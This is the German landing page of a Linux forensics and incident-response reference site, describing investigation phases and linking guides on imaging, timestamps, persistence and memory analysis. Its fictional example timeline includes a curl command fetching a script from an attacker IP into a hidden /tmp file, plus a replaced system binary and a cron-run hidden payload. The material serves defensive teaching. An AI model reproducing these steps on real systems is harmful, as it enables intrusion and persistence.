Zum Inhalt springen

Praxisreferenz für Linux-DFIR

Linux-Systeme sicher untersuchen.

Wo die Spuren liegen, was sie beweisen und wie man sie sichert, ohne sie zu zerstören: Logs und systemd-Journal, Shell-Historie, Persistenz, ext4- und XFS-Zeitstempel, Speicher, Container und Triage.

Untersuchungsbereiche
9
ausführliche Leitfäden
11
Glossarbegriffe
12
Super-Timeline · web-prod-03UTC
  1. 02:13:07auth.logsshd: Accepted publickey for deploy from 203.0.113.50
  2. 02:13:41bash_historycurl -s http://203.0.113.50/k.sh -o /tmp/.k
  3. 02:14:02ext4 crtime/tmp/.k born · inode 1310722
  4. 02:15:19journalsystemd: Enabled dbus-helper.service
  5. 02:15:20ext4 mtime/usr/bin/ss replaced · dpkg -V: ??5??????
  6. 02:31:55cron(root) CMD (/usr/lib/.cache/upd)
$psort.py -o l2tcsv case.plaso "date > '2026-03-14 02:00:00'"
Anschauliches Beispiel: ein fiktiver Einbruch, rekonstruiert aus fünf Artefaktquellen.

/var/evidence

Die Landkarte der Linux-Forensik

Neun Bereiche decken die Artefakte ab, die auf einem kompromittierten Linux-System zählen. Jeder führt zu ausführlichen Leitfäden mit Befehlen, Tabellen und Stolperfallen.

Vorgehen

Vom ersten Alarm zur belastbaren Zeitleiste

Dieselben fünf Phasen gelten für eine einzelne Cloud-VM ebenso wie für eine ganze Serverflotte.

  1. 01

    Sichern

    Zuerst Flüchtiges erfassen: Speicher, Prozesse, Sockets. Datenträger per Snapshot oder Image sichern und Hashes dokumentieren.

  2. 02

    Triage

    UAC oder einen Velociraptor-Kollektor starten und Logs, Historien und Konfiguration in Minuten einsammeln.

  3. 03

    Analysieren

    Authentifizierungslogs, Journal, Shell-Historie, Persistenzorte und Paketzustand auswerten.

  4. 04

    Korrelieren

    Dateisystem-, Log- und Speicherspuren zu einer UTC-Super-Timeline zusammenführen und pivotieren.

  5. 05

    Berichten

    Festhalten, was jedes Artefakt beweist, was es nicht beweisen kann und wie es überprüft wurde.

~/guides

Neueste Leitfäden

Diese Leitfäden sind derzeit nur auf Englisch verfügbar. Die folgenden Links öffnen die englische Fassung.

Alle Leitfäden ansehen
01 · Sicherung & TriageEnglisch

Acquiring Linux Evidence: Disk Imaging and Read-Only Mounts

How to acquire Linux evidence soundly: order of volatility, live vs dead acquisition, dd/dc3dd/ewfacquire imaging, cloud snapshots and read-only mounts.

acquisitiondisk-imagingchain-of-custody
05 · Dateisystem & ZeitstempelEnglisch

ext4 and XFS Timestamps, Inodes and Deleted Files

How to read MAC and birth timestamps on ext4 and XFS, spot timestomping through ctime, and understand the real limits of deleted file recovery on Linux.

ext4xfstimestamps
04 · PersistenzEnglisch

Hunting Linux Persistence: Cron, systemd, SSH and More

Where attackers hide persistence on Linux (cron, systemd units and timers, shell startup files, SSH keys, ld.so.preload, PAM, udev, modules) and how to find it.

persistencecronsystemd
06 · SpeicherforensikEnglisch

Linux Memory Forensics with LiME, AVML and Volatility 3

Acquire Linux RAM with LiME or AVML, build Volatility 3 symbol tables with dwarf2json, and find hidden processes, rootkit modules and bash history in memory.

memory-forensicsvolatilitylime